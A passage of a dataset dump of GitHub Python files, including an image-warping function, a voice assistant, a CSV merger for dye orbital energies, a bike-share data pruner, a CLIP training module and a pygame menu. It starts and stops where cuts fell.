0.5, 0.75, 1, 1.2):\n num = max(1, round(total_num_cpu * mult))\n if num not in stages:\n stages.append(num)\n\n for num_proc in stages:\n started = time.time()\n num_docs.value = opts.tasks_number\n print('[%d proc]' % num_proc, end=' ')\n pool = []\n\n for _ in range(num_proc):\n proc = Process(\n target=engine_func_reg[engine]['thread_func'],\n args=[\n engine_func_reg[engine]['parser_func'],\n data,\n num_docs\n ]\n )\n proc.start()\n pool.append(proc)\n [x.join() for x in pool]\n elapsed = time.time() - started\n print(' %.2f sec ' % elapsed)\n\nif __name__ == '__main__':\n main()\n","repo_name":"HoltTechnologyCorporation/lxmlbench","sub_path":"runtest.py","file_name":"runtest.py","file_ext":"py","file_size_in_byte":5329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"42705043884","text":"# import tensorflow as tf\nimport numpy as np\n\n\ndef grid_sample_native(img, flow):\n \"\"\"Performs a backward warp of an image using the predicted flow.\n Args:\n img: single image. [height, width, channels]\n flow: Batch of flow vectors. [height, width, 2]\n Returns:\n warped: transformed image of the same shape as the input image.\n \"\"\"\n height, width, channels = img.shape\n max_x = int(height - 1)\n max_y = int(width - 1)\n\n zero = np.zeros([], np.int32)\n\n # We have to flatten our tensors to vectorize the interpolation\n im_flat = np.reshape(img, [-1, channels])\n flow_flat = np.reshape(flow, [-1, 2])\n\n # Floor the flow, as the final indices are integers\n # The fractional part is used to control the bilinear interpolation.\n flow_floor = np.floor(flow_flat).astype(np.int32)\n bilinear_weights = flow_flat - np.floor(flow_flat)\n\n # Construct base indices which are displaced with the flow\n pos_x = np.tile(np.arange(width), [height])\n grid_y = np.tile(np.expand_dims(np.arange(height), 1), [1, width])\n pos_y = np.tile(np.reshape(grid_y, [-1]), [1])\n\n x = flow_floor[:, 0]\n y = flow_floor[:, 1]\n xw = bilinear_weights[:, 0]\n yw = bilinear_weights[:, 1]\n\n # Compute interpolation weights for 4 adjacent pixels\n # expand to num_batch * height * width x 1 for broadcasting in add_n below\n wa = np.expand_dims((1 - xw) * (1 - yw), 1) # top left pixel\n wb = np.expand_dims((1 - xw) * yw, 1) # bottom left pixel\n wc = np.expand_dims(xw * (1 - yw), 1) # top right pixel\n wd = np.expand_dims(xw * yw, 1) # bottom right pixel\n\n x0 = pos_x + x\n x1 = x0 + 1\n y0 = pos_y + y\n y1 = y0 + 1\n\n x0 = np.clip(x0, zero, max_x)\n x1 = np.clip(x1, zero, max_x)\n y0 = np.clip(y0, zero, max_y)\n y1 = np.clip(y1, zero, max_y)\n\n dim1 = width * height\n batch_offsets = np.arange(1) * dim1\n base_grid = np.tile(np.expand_dims(batch_offsets, 1), [1, dim1])\n base = np.reshape(base_grid, [-1])\n\n base_y0 = base + y0 * width\n base_y1 = base + y1 * width\n idx_a = base_y0 + x0\n idx_b = base_y1 + x0\n idx_c = base_y0 + x1\n idx_d = base_y1 + x1\n\n # Ia = gather_numpy()\n Ia = np.take(im_flat, idx_a, axis=0)\n Ib = np.take(im_flat, idx_b, axis=0)\n Ic = np.take(im_flat, idx_c, axis=0)\n Id = np.take(im_flat, idx_d, axis=0)\n\n # tmp = wa * Ia\n warped_flat = wa * Ia + wb * Ib + wc * Ic + wd * Id\n warped = np.reshape(warped_flat, [height, width, channels])\n\n return warped\n\n# def grid_sample_pytorch():\n\n\ndef _ReadFlow(flow_path, w, h):\n\n with open(flow_path, 'rb') as f:\n\n data = np.fromfile(f, np.float32, count=int(w) * int(h))\n # Reshape data into 2D array (columns, rows, bands)\n return np.reshape(data, (int(h), int(w)))\n\n\nif __name__ == \"__main__\":\n\n import torch\n import cv2\n import numpy as np\n import os\n\n img_path = './experiment/image/Sk55npEXD_48513_363_ori.png'\n gt_path = './experiment/image/Sk55npEXD_48513_363_xiu.png'\n flowx_path = './experiment/flow/Sk55npEXD_48513_363_vx.bin'\n flowy_path = './experiment/flow/Sk55npEXD_48513_363_vy.bin'\n image = cv2.imread(img_path)\n GT = cv2.imread(gt_path)\n h, w, c = image.shape\n flow_array_x = _ReadFlow(flowx_path, w, h)\n flow_array_y = _ReadFlow(flowy_path, w, h)\n flow_array = np.transpose(np.array([flow_array_x, flow_array_y]), [1, 2, 0])\n\n warp_image1 = grid_sample_native(image, flow_array)\n cv2.imwrite('./experiment/output_naive.png', warp_image1.astype(np.uint8))\n","repo_name":"haddis3/grid_sample_naive","sub_path":"grid_sample_naive.py","file_name":"grid_sample_naive.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"25840403614","text":"writingData = \"aaaaaaaaaaaaaa\\n\"\nwritingData += \"ssssssssss\\n\"\nwritingData += \"XXXXXXXXXXX\\n\"\n\nwith open(\"read.txt\", 'a', encoding=\"utf-8\") as file:\n file.write(writingData)\n\nwith open(\"read.txt\", 'r', encoding=\"utf-8\") as file:\n dataList = file.readlines() #readLinesはリストで取得できる便利機能だが、改行文字も一緒に読み込むので注意が必要\n\n\nfor data in dataList:\n print(data[:-1])\n","repo_name":"shibafu/MyPythonTutorial","sub_path":"tsugarusoft/com/Lesson6NewFile.py","file_name":"Lesson6NewFile.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"28299356828","text":"# Python Micro Assistant : LEMON\n\nimport pyttsx3\nimport speech_recognition as sr\nimport webbrowser\nimport datetime\nimport wikipedia\n\n# method to recognize the commands given to LEMON\n# using speech_Recognition module \ndef takeCommand():\n\n\tr = sr.Recognizer()\n\n\twith sr.Microphone() as source:\n\t\tprint('Listening')\n\t\tr.adjust_for_ambient_noise(source, duration = 1)\n\n\t\t# seconds of non-speaking audio before a phrase is considered complete\n\t\tr.pause_threshold = 0.7\n\t\taudio = r.listen(source)\n\n\t\ttry:\n\t\t\tprint(\"Recognizing\")\n\t\t\tQuery = r.recognize_google(audio, language='en-IN')\n\t\t\tprint(\"Your Query = \", Query)\n\t\t\t\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\tprint(\"Pardon please\")\n\t\t\treturn \"None\"\n\t\t\n\t\treturn Query\n\ndef speak(audio):\n\t\n\tengine = pyttsx3.init()\n\n\t# gets the current value of engine property\n\tvoices = engine.getProperty('voices')\n\t\n\tengine.setProperty('voice', voices[11].id)\n\t''' \n\tvoices[11].id represents english :\n\n\t english\n\n\t# CODE to obtain the Voice ID in file check.py\n\t'''\n\tengine.say(audio)\n\t\n\t# blocks while processing all the currently queued commands\n\tengine.runAndWait()\n\ndef tellDay():\n\t\n\tday = datetime.datetime.today().weekday() + 1\n\tDay_dict = {1: 'Monday', 2: 'Tuesday',\n\t\t\t\t3: 'Wednesday', 4: 'Thursday',\n\t\t\t\t5: 'Friday', 6: 'Saturday',\n\t\t\t\t7: 'Sunday'}\n\t\n\tif day in Day_dict.keys():\n\t\tday_of_the_week = Day_dict[day]\n\t\tprint(day_of_the_week)\n\t\tspeak(\"The day is \" + day_of_the_week)\n\n\ndef tellTime():\n\t\n\ttime = str(datetime.datetime.now())\n\t\n\t# time format \"2020-06-05 17:50:14.582630\" before slicing\n\tprint(time)\n\thour = time[11:13]\n\tmin = time[14:16]\n\tspeak(\"The time is sir\" + hour + \"Hours and\" + min + \"Minutes\")\t\n\ndef Hello():\n\tspeak(\"Hello, how can I help you?\")\n\n\ndef Take_query():\n\n\tHello()\n\t\n\t# infinite loop to keep listening until\n\t# bye is said or program is terminated\n\twhile(True):\n\n\t\tquery = takeCommand().lower()\n\t\tif \"open github\" in query:\n\t\t\tspeak(\"Opening GitHub \")\n\t\t\twebbrowser.open(\"github.com\")\n\t\t\tcontinue\n\t\t\n\t\telif \"open google\" in query:\n\t\t\tspeak(\"Opening Google \")\n\t\t\twebbrowser.open(\"www.google.com\")\n\t\t\tcontinue\n\t\t\t\n\t\telif \"which day is it\" in query:\n\t\t\ttellDay()\n\t\t\tcontinue\n\t\t\n\t\telif \"what time is it\" in query:\n\t\t\ttellTime()\n\t\t\tcontinue\n\t\t\n\t\t# this will exit and terminate the program\n\t\telif \"bye\" in query:\n\t\t\tspeak(\"Bye, have a nice day!\")\n\t\t\texit()\n\t\t\n\t\telif \"from wikipedia\" in query:\n\t\t\tspeak(\"Checking the wikipedia \")\n\t\t\tquery = query.replace(\"wikipedia\", \"\")\n\t\t\t\n\t\t\t# results into summary of 4 lines (customizable) from wikipedia\n\t\t\tresult = wikipedia.summary(query, sentences = 4)\n\t\t\tspeak(\"According to wikipedia, \")\n\t\t\tprint(result)\n\t\t\tspeak(result)\n\t\t\n\t\telif \"what is your name\" in query:\n\t\t\tspeak(\"I am Lemon, your deskstop Assistant until you say bye\")\n\nif __name__ == '__main__':\n\tTake_query()\n","repo_name":"m0rphtail/Lemon","sub_path":"lemon.py","file_name":"lemon.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"72020314565","text":"from hashlib import new\nimport pandas as pd\nimport json\n\ndef csv_names(file):\n name = []\n with open(file,'r') as fp:\n data = fp.readlines()\n for line in data[1:]:\n line=line.split(',')\n name.append(line[0])\n return name\n\ndef json_reader(json_file):\n red = {}\n with open(json_file,'r') as fp:\n data = json.load(fp)\n for mol in data:\n #print(mol['nam'])\n # print(mol['lsf'])\n for exc in mol['lsf']:\n if exc['exc']==1:\n #print(exc)\n red[mol['name']] = (exc['nm'],exc['HOMO'],exc['LUMO'])\n # print(red)\n # print(red)\n #print(exc)\n # for exc in mol['name']:\n # print(exc['lsf'])\n\n # print(mol['name']['lsf'])\n # for mol in data[\"molecules\"]:\n # for exc in mol[\"lsf\"]:\n # if exc['exc']==1:\n # red[mol['name']] = (exc['nm'],exc['HOMO'],exc['LUMO'])\n return red\n\ndef df_adder(filename,names,red,output):\n new_dict = {}\n for name in names:\n if name in red.keys():\n #print(name)\n new_dict[name]=red[name]\n #print(new_dict)\n df_2 = pd.read_csv(filename)\n # print(df_2)\n \n \n \n\n \n # print(df_2['HOMO Donor'])\n\n\n # print((line,'HELPP'))\n \n df = {\n 'name':[],\n 'HOMO Donor':[],\n 'LUMO Donor':[],\n \n 'HOMO Backbone':[],\n 'LUMO Backbone':[],\n 'HOMO Acceptor':[],\n 'LUMO Acceptor':[],\n 'HOMO Anchor':[],\n 'LUMO Anchor':[],\n \n\n 'homo': [],\n 'lumo':[],\n 'wave': []\n }\n '''\n \n for name in names:\n #print(df_2[0])\n ll = df_2.loc[df_2['Name'] == name]\n a = ll['HOMO Donor'].to_string()\n a = str(a[4:])\n df['HOMO Donor'].append(a)\n\n b = ll['LUMO Donor'].to_string() \n b = str(b[4:])\n df['LUMO Donor'].append(b)\n \n\n c = ll['HOMO Backbone'].to_string() \n c = str(c[4:])\n df['HOMO Backbone'].append(c)\n \n\n d = ll['LUMO Backbone'].to_string() \n d = str(d[4:])\n df['LUMO Backbone'].append(d)\n \n\n e = ll['HOMO Acceptor'].to_string() \n e = str(e[4:])\n df['HOMO Acceptor'].append(e)\n \n\n h = ll['LUMO Acceptor'].to_string() \n print(h)\n h = str(h[4:])\n df['LUMO Acceptor'].append(h)\n \n\n i = ll['HOMO Anchor'].to_string() \n i = str(i[4:])\n df['HOMO Anchor'].append(i)\n \n\n k = ll['LUMO Anchor'].to_string() \n k = str(k[4:])\n df['LUMO Anchor'].append(k)\n '''\n \n\n\n\n\n\n\n\n\n error = []\n # ignore = ['2ed_29b_7ea', '2ed_29b_5ea', '2ed_29b_11ea', '2ed_29b_10ea', '2ed_29b_9ea', '2ed_29b_6ea', '2ed_29b_2ea', '2ed_29b_3ea', '2ed_29b_1ea', '2ed_29b_4ea', '9ed_29b_1ea', '2ed_29b_8ea', '9ed_30b_7ea', '9ed_33b_11ea', '9ed_29b_8ea', '2ed_30b_5ea', '9ed_30b_11ea', '9ed_30b_2ea', '2ed_30b_1ea', '2ed_36b_5ea', '2ed_30b_4ea', '2ed_30b_8ea']\n# ignore = ['9ed_32b_8ea', '10ed_35b_5ea', '2ed_35b_3ea', '10ed_33b_4ea', '2ed_8b_4ea', '2ed_30b_6ea', '2ed_35b_8ea', '2ed_35b_11ea', '2ed_34b_8ea', '9ed_1b_3ea', '2ed_35b_10ea', '2ed_34b_7ea', '2ed_35b_7ea', '10ed_16b_2ea', '9ed_34b_2ea', '2ed_35b_5ea', '2ed_35b_1ea', '9ed_33b_4ea', '2ed_34b_5ea', '2ed_31b_7ea', '2ed_30b_7ea', '11ed_10b_9ea', '2ed_34b_6ea', '2ed_31b_1ea', '9ed_31b_1ea', '2ed_31b_9ea', '2ed_35b_9ea', '9ed_33b_1ea', '9ed_35b_10ea', '2ed_34b_2ea', '2ed_35b_4ea', '9ed_34b_11ea', '2ed_31b_10ea', '1ed_8b_9ea', '2ed_34b_3ea', '2ed_34b_11ea']\n ignore = ['9ed_32b_8ea', '10ed_35b_5ea', '2ed_35b_3ea', '10ed_33b_4ea', '2ed_8b_4ea', '2ed_30b_6ea', '2ed_35b_8ea', '2ed_35b_11ea', '2ed_34b_8ea', '9ed_1b_3ea', '2ed_35b_10ea', '2ed_34b_7ea', '2ed_35b_7ea', '10ed_16b_2ea', '9ed_34b_2ea', '2ed_35b_5ea', '2ed_35b_1ea', '9ed_33b_4ea', '2ed_34b_5ea', '2ed_31b_7ea', '2ed_30b_7ea', '11ed_10b_9ea', '2ed_34b_6ea', '2ed_31b_1ea', '9ed_31b_1ea', '2ed_31b_9ea', '2ed_35b_9ea', '9ed_33b_1ea', '9ed_35b_10ea', '2ed_34b_2ea', '2ed_35b_4ea', '9ed_34b_11ea', '2ed_31b_10ea', '1ed_8b_9ea', '2ed_34b_3ea', '2ed_34b_11ea']\n names_2 = []\n for name in names:\n if name in ignore:\n print(name)\n else:\n names_2.append(name)\n \n \n for name in names_2:\n try:\n \n ll = df_2.loc[df_2['Name'] == name]\n # print(ll)\n a = ll['HOMO Donor'].to_string()\n # print(a)\n a = str(a[4:])\n df['HOMO Donor'].append(a)\n\n b = ll['LUMO Donor'].to_string() \n b = str(b[4:])\n df['LUMO Donor'].append(b)\n \n\n c = ll['HOMO Backbone'].to_string() \n c = str(c[4:])\n df['HOMO Backbone'].append(c)\n \n\n d = ll['LUMO Backbone'].to_string() \n d = str(d[4:])\n df['LUMO Backbone'].append(d)\n \n\n e = ll['HOMO Acceptor'].to_string() \n e = str(e[4:])\n df['HOMO Acceptor'].append(e)\n \n\n h = ll['LUMO Acceptor'].to_string() \n print(h)\n h = str(h[4:])\n df['LUMO Acceptor'].append(h)\n \n\n i = ll['HOMO Anchor'].to_string() \n i = str(i[4:])\n df['HOMO Anchor'].append(i)\n \n\n k = ll['LUMO Anchor'].to_string() \n k = str(k[4:])\n df['LUMO Anchor'].append(k)\n \n\n \n df['name'].append(name)\n df['wave'].append(new_dict[name][0])\n df['lumo'].append(new_dict[name][1])\n # df['lumo'].append(new_dict[name][2])\n df['homo'].append(new_dict[name][2])\n # df['homo'].append(new_dict[name][1])\n except KeyError:\n df['name'].append(name)\n df['HOMO Donor'].append('Key Error')\n df['LUMO Donor'].append('Key Error')\n df['HOMO Backbone'].append('Key Error')\n df['LUMO Backbone'].append('Key Error')\n df['HOMO Acceptor'].append('Key Error')\n df['LUMO Acceptor'].append('Key Error')\n df['HOMO Anchor'].append('Key Error')\n df['LUMO Anchor'].append('Key Error')\n df['wave'].append('Key Error')\n df['lumo'].append('Key Error')\n df['homo'].append('Key Error')\n error.append(name)\n print('Dyes with key error')\n print(error)\n print(len(error))\n df = pd.DataFrame(df)\n print(df)\n # print(name)\n \n # wave.append(new_dict[name][0])\n # lumo.append(new_dict[name][1])\n # homo.append(new_dict[name][2])\n \n \n #df['LUMO Energy']=lumo\n #df['HOMO Energy']=homo\n #df['Wave']=wave\n df.to_csv('../data_analysis/%s.csv' % output,index=False)\n \n # print(df)\n \n \n \n\n\n return df\n\n\n\ndef main():\n # filename = '../data_analysis/percentages_800to1000.csv'\n # namer = '../data_analysis/names_for_paper_800_to_1000.csv'\n # filename = '../data_analysis/names_for_paper_600_to_800.csv'\n namer = '../data_analysis/names_for_paper_600_to_800.csv'\n namer = '../data_analysis/600_final_before_scoring.csv'\n # filename = '../data_analysis/fin_800.csv'\n filename = '../data_analysis/percentages.csv'\n# filename = '../data_analysis/test.csv'\n\n json_file = '../json_files/ds_all5_out.json'\n# output_file = '../data_analysis/800_final_before_scoring'\n output_file = '../data_analysis/600_all_before_scoring'\n\n names = csv_names(filename)\n # names = csv_names(namer)\n print(len(names))\n red = json_reader(json_file)\n print(red)\n df_adder(filename,names,red,output_file)\n\n\n\n\n # dataframe_editor(filename,json_file)\n\n return\nmain()\n","repo_name":"Awallace3/Dyes","sub_path":"src/percentage_csv_editor.py","file_name":"percentage_csv_editor.py","file_ext":"py","file_size_in_byte":7745,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"71003162245","text":"import os, json, csv\nfrom haversine import haversine, Unit\n\n#Overall the thought is that we'd append to a few(?) CSVs the data from \"data\" folder.\n#Then afterwards it could be deleted\n\n#We'll only do \"free_bike_status\" since it's our only High Freq (other than \"dc\")\n#Also starting on just \"austin_scooter_jump_system\"\n\ndef convertBikeListToDict(prevJson, curJson, nextJson):\n prevDict, curDict, nextDict = {}, {}, {}\n\n keysToPull = [\"lat\", \"lon\", \"is_reserved\", \"is_disabled\", \"jump_vehicle_type\", \"jump_ebike_battery_level\", \"jump_vehicle_name\"]\n\n for rtnDict, bikeList in zip([prevDict, curDict, nextDict], [prevJson, curJson, nextJson]):\n for bike in bikeList:\n rtnDict[bike['bike_id']] = {}\n for k in keysToPull:\n rtnDict[bike['bike_id']][k] = bike[k]\n\n return prevDict, curDict, nextDict\n\ndef hasAnyChange(prevBikeData, curBikeData, nextBikeData):\n rtn = False\n for k in curBikeData:\n if prevBikeData[k] == curBikeData[k] == nextBikeData[k]:\n pass\n else:\n rtn = True\n break\n\n return rtn\n\ndef main():\n projectFolder = \"austin_scooter_jump_system\"\n dataFolder = \"free_bike_status\"\n\n fileList = [\"data/\"+projectFolder+\"/\"+dataFolder+\"/\"+f for f in os.listdir(os.curdir+\"/data/\"+projectFolder+\"/\"+dataFolder)]\n fileList.sort()\n\n outputWriter = csv.writer(open(projectFolder+\"__\"+dataFolder+\".csv\", \"wt\"), lineterminator='\\n')\n outputHeader = [\"bike_id\", \"lat\", \"lon\", \"is_reserved\", \"is_disabled\", \\\n \"jump_vehicle_type\", \"jump_ebike_battery_level\", \"jump_vehicle_name\", \\\n \"prev_lat\", \"prev_lon\", \"prev_jump_ebike_battery_level\", \"next_lat\", \\\n \"next_lon\", \"next_jump_ebike_battery_level\", \"prev_haversine\", \"next_haversine\", \\\n \"prev_timestamp\", \"cur_timestamp\", \"next_timestamp\"]\n\n outputWriter.writerow(outputHeader)\n\n for curIdx in range(1, len(fileList)-1):\n print(curIdx)\n prevIdx = curIdx-1\n nextIdx = curIdx+1\n\n prevJson = json.load(open(fileList[prevIdx], 'rt'))['data']['bikes']\n curJson = json.load(open(fileList[curIdx], 'rt'))['data']['bikes']\n nextJson = json.load(open(fileList[nextIdx], 'rt'))['data']['bikes']\n\n prevDict, curDict, nextDict = convertBikeListToDict(prevJson, curJson, nextJson)\n\n for bikeId, curBikeData in curDict.items():\n #try:\n # if not hasAnyChange(prevDict[bikeId], curBikeData, nextDict[bikeId]):\n # continue\n #except(KeyError):\n # pass\n oRow = [bikeId]\n for oHeader in outputHeader[1:8]:\n oRow.append(curBikeData[oHeader])\n\n try:\n oRow.append(prevDict[bikeId]['lat'])\n oRow.append(prevDict[bikeId]['lon'])\n oRow.append(prevDict[bikeId]['jump_ebike_battery_level'])\n except(KeyError):\n oRow.extend(['', '', ''])\n\n try:\n oRow.append(nextDict[bikeId]['lat'])\n oRow.append(nextDict[bikeId]['lon'])\n oRow.append(nextDict[bikeId]['jump_ebike_battery_level'])\n except(KeyError):\n oRow.extend(['', '', ''])\n\n\n curPoint = (curBikeData['lat'], curBikeData['lon'])\n\n try:\n prevPoint = (prevDict[bikeId]['lat'], prevDict[bikeId]['lon'])\n oRow.append(haversine(prevPoint, curPoint, unit=Unit.MILES))\n except(KeyError):\n oRow.append(\"\")\n\n try:\n nextPoint = (nextDict[bikeId]['lat'], nextDict[bikeId]['lon'])\n oRow.append(haversine(curPoint, nextPoint, unit=Unit.MILES))\n except(KeyError):\n oRow.append(\"\")\n\n startFilterIdx = len(projectFolder)+len(dataFolder)+len(\"data/\")+2\n\n oRow.extend([fileList[prevIdx][startFilterIdx:-5], fileList[curIdx][startFilterIdx:-5], fileList[nextIdx][startFilterIdx:-5]])\n\n outputWriter.writerow(oRow)\n\nmain()\n","repo_name":"hoopskin/GBFS-Scraping","sub_path":"pruneDataFiles.py","file_name":"pruneDataFiles.py","file_ext":"py","file_size_in_byte":4086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"10099510776","text":"from django.conf.urls.defaults import *\nfrom django.conf import settings\nimport views\n\nimport dselector\nparser = dselector.Parser()\nurl = parser.url\n\nurlpatterns = parser.patterns('', \n url(r'$', views.search, name='search'),\n url(r'search-results$', views.search_results, name='search_results'),\n url(r'spreadsheet/{spreadsheet_id:digits}$', views.spreadsheet, name='spreadsheet'),\n url(r'spreadsheet/queue_generation$', views.queue_generation, name='queue_generation'),\n url(r'spreadsheet/{spreadsheet_id:digits}/save-basic$', views.save_basic_info, name='save_basic_info'),\n url(r'spreadsheet/delete$', views.delete, name='delete'),\n url(r'spreadsheet/{spreadsheet_id:digits}/email-list$', views.email_list, name='email_list'),\n url(r'spreadsheet/group-count$', views.group_count, name='group_count'),\n\n url(r'new$', views.new, name='new_spreadsheet'),\n \n \n)","repo_name":"skoczen/mycelium","sub_path":"mycelium/apps/spreadsheets/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"36033768536","text":"from typing import Any, Optional\nfrom pytorch_lightning.utilities.types import STEP_OUTPUT\nimport timm\nfrom transformers import DistilBertModel, DistilBertConfig, DistilBertTokenizer\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom config import CFG\nimport pytorch_lightning as pl\nimport itertools\n\nclass ImageEncoder(nn.Module):\n \"\"\"\n Encode images to a fixed size vector\n \"\"\"\n\n def __init__(\n self, model_name=CFG.model_name, pretrained=CFG.pretrained, trainable=CFG.trainable\n ):\n super().__init__()\n self.model = timm.create_model(\n model_name, pretrained, num_classes=0, global_pool=\"avg\"\n )\n for p in self.model.parameters():\n p.requires_grad = trainable\n\n def forward(self, x):\n return self.model(x)\n \nclass TextEncoder(nn.Module):\n def __init__(self, model_name=CFG.text_encoder_model, pretrained=CFG.pretrained, trainable=CFG.trainable):\n super().__init__()\n if pretrained:\n self.model = DistilBertModel.from_pretrained(model_name)\n else:\n self.model = DistilBertModel(config=DistilBertConfig())\n \n for p in self.model.parameters():\n p.requires_grad = trainable\n\n # we are using the CLS token hidden representation as the sentence's embedding\n self.target_token_idx = 0\n\n def forward(self, input_ids, attention_mask):\n output = self.model(input_ids=input_ids, attention_mask=attention_mask)\n last_hidden_state = output.last_hidden_state\n return last_hidden_state[:, self.target_token_idx, :]\n \nclass ProjectionHead(nn.Module):\n def __init__(\n self,\n embedding_dim,\n projection_dim=CFG.projection_dim,\n dropout=CFG.dropout\n ):\n super().__init__()\n self.projection = nn.Linear(embedding_dim, projection_dim)\n self.gelu = nn.GELU()\n self.fc = nn.Linear(projection_dim, projection_dim)\n self.dropout = nn.Dropout(dropout)\n self.layer_norm = nn.LayerNorm(projection_dim)\n \n def forward(self, x):\n projected = self.projection(x)\n x = self.gelu(projected)\n x = self.fc(x)\n x = self.dropout(x)\n x = x + projected\n x = self.layer_norm(x)\n return x\n\ndef cross_entropy(preds, targets, reduction='none'):\n log_softmax = nn.LogSoftmax(dim=-1)\n loss = (-targets * log_softmax(preds)).sum(1)\n if reduction == \"none\":\n return loss\n elif reduction == \"mean\":\n return loss.mean()\n\nclass CLIPModel(pl.LightningModule):\n\n def __init__(self,temperature=CFG.temperature,\n image_embedding=CFG.image_embedding,\n text_embedding=CFG.text_embedding) -> None:\n super().__init__()\n\n self.image_encoder = ImageEncoder()\n self.text_encoder = TextEncoder()\n self.image_projection = ProjectionHead(embedding_dim=image_embedding)\n self.text_projection = ProjectionHead(embedding_dim=text_embedding)\n self.temperature = temperature\n\n self.train_losses = []\n self.val_losses = []\n\n self.params = [\n {\"params\": self.image_encoder.parameters(), \"lr\": CFG.image_encoder_lr},\n {\"params\": self.text_encoder.parameters(), \"lr\": CFG.text_encoder_lr},\n {\"params\": itertools.chain(\n self.image_projection.parameters(), self.text_projection.parameters()\n ), \"lr\": CFG.head_lr, \"weight_decay\": CFG.weight_decay}\n ]\n\n self.epoch_condition = 0\n\n def forward(self, batch):\n # Getting Image and Text Features\n image_features = self.image_encoder(batch[\"image\"])\n text_features = self.text_encoder(\n input_ids=batch[\"input_ids\"], attention_mask=batch[\"attention_mask\"]\n )\n # Getting Image and Text Embeddings (with same dimension)\n image_embeddings = self.image_projection(image_features)\n text_embeddings = self.text_projection(text_features)\n\n # Calculating the Loss\n logits = (text_embeddings @ image_embeddings.T) / self.temperature\n images_similarity = image_embeddings @ image_embeddings.T\n texts_similarity = text_embeddings @ text_embeddings.T\n targets = F.softmax(\n (images_similarity + texts_similarity) / 2 * self.temperature, dim=-1\n )\n texts_loss = cross_entropy(logits, targets, reduction='none')\n images_loss = cross_entropy(logits.T, targets.T, reduction='none')\n loss = (images_loss + texts_loss) / 2.0 # shape: (batch_size)\n return loss.mean()\n \n def training_step(self, batch, batch_idx):\n\n loss = self.forward(batch)\n\n self.log(\"train_loss\",loss,prog_bar=True)\n self.train_losses.append(loss.item())\n \n mean_loss = sum(self.train_losses) / len(self.train_losses)\n self.log(\"Mean Train Loss\", mean_loss, prog_bar=True)\n\n self.epoch_condition = 1\n\n return loss\n\n def validation_step(self, batch, batch_idx):\n \n loss = self.forward(batch)\n self.log(\"val_loss\",loss,prog_bar=True)\n self.val_losses.append(loss.item())\n\n def on_validation_epoch_end(self):\n\n if self.epoch_condition > 0:\n\n print(f\"Epoch : {self.current_epoch+1}\")\n\n train_loss_mean = sum(self.train_losses) / len(self.train_losses)\n print(f\"Training Loss : {train_loss_mean:0.4f}\")\n\n val_loss_mean = sum(self.val_losses) / len(self.val_losses)\n print(f\"Validation Loss : {val_loss_mean:0.4f}\")\n\n self.train_losses = []\n self.val_losses = []\n\n self.epoch_condition = 0\n\n if self.current_epoch+1 == self.trainer.max_epochs:\n torch.save(self.state_dict(), \"best.pt\")\n print(\"Saving Model\")\n\n def configure_optimizers(self) -> Any:\n optimizer = torch.optim.AdamW(self.params, weight_decay=0.)\n lr_scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(\n optimizer, mode=\"min\", patience=CFG.patience, factor=CFG.factor\n )\n \n return {\n 'optimizer': optimizer,\n 'lr_scheduler': {\n 'scheduler': lr_scheduler,\n 'monitor': 'val_loss' # Monitor validation loss for reducing LR\n }\n }\n \n\n\n","repo_name":"TharunSivamani/CLIP","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"9144609192","text":"SL1_PREFIX = '10.130.153.'\nSL2_PREFIX = '10.130.154.'\nSL3_PREFIX = '10.130.155.'\nCS101_PREFIX = '10.130.152.'\nSL2_LAST_NODE = 132\nSL1_LAST_NODE = 83\nSL3_LAST_NODE = 44\nCS101_LAST_NODE = 148\nHEAD_NODE = 200\n\nSL1_IPs = [SL1_PREFIX + str(i) for i in range(1, SL1_LAST_NODE + 1)]\nSL2_IPs = [SL2_PREFIX + str(i) for i in range(1, SL2_LAST_NODE + 1)]\nSL3_IPs = [SL3_PREFIX + str(i) for i in range(1, SL3_LAST_NODE + 1)]\nCS101_IPs = [CS101_PREFIX + str(i) for i in range(1, CS101_LAST_NODE + 1)]\n\nSL1_IPs.append(SL1_PREFIX + str(HEAD_NODE))\nSL2_IPs.append(SL2_PREFIX + str(HEAD_NODE))\nSL3_IPs.append(SL3_PREFIX + str(HEAD_NODE))\nCS101_IPs.append(CS101_PREFIX + str(HEAD_NODE))\n","repo_name":"prantostic/IITB","sub_path":"CS699/Project/source/server/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"40271008148","text":"import pygame\n\nclass StartMenu:\n def __init__(self):\n self.font = pygame.font.Font(None, 36)\n self.title = self.font.render(\"Platformer title\", True, (255, 255, 255))\n self.start_option = self.font.render(\"Start Game\", True, (255, 255, 255))\n self.quit_option = self.font.render(\"Quit\", True, (255, 255, 255))\n self.selected_option = 0 # Initially select the \"Start Game\" option\n self.option_color = (255, 255, 255)\n self.selected_color = (255, 0, 0) # Color for the selected option\n\n def draw(self, screen):\n screen.fill((100, 80, 80))\n screen.blit(self.title, (200, 100))\n screen.blit(self.start_option, (300, 200))\n screen.blit(self.quit_option, (300, 250))\n\n if self.selected_option == 0:\n screen.blit(self.start_option, (300, 200))\n pygame.draw.rect(screen, self.selected_color, (295, 200, self.start_option.get_width() + 10, self.start_option.get_height()), 2)\n else:\n screen.blit(self.start_option, (300, 200))\n\n if self.selected_option == 1:\n screen.blit(self.quit_option, (300, 250))\n pygame.draw.rect(screen, self.selected_color, (295, 250, self.quit_option.get_width() + 10, self.quit_option.get_height()), 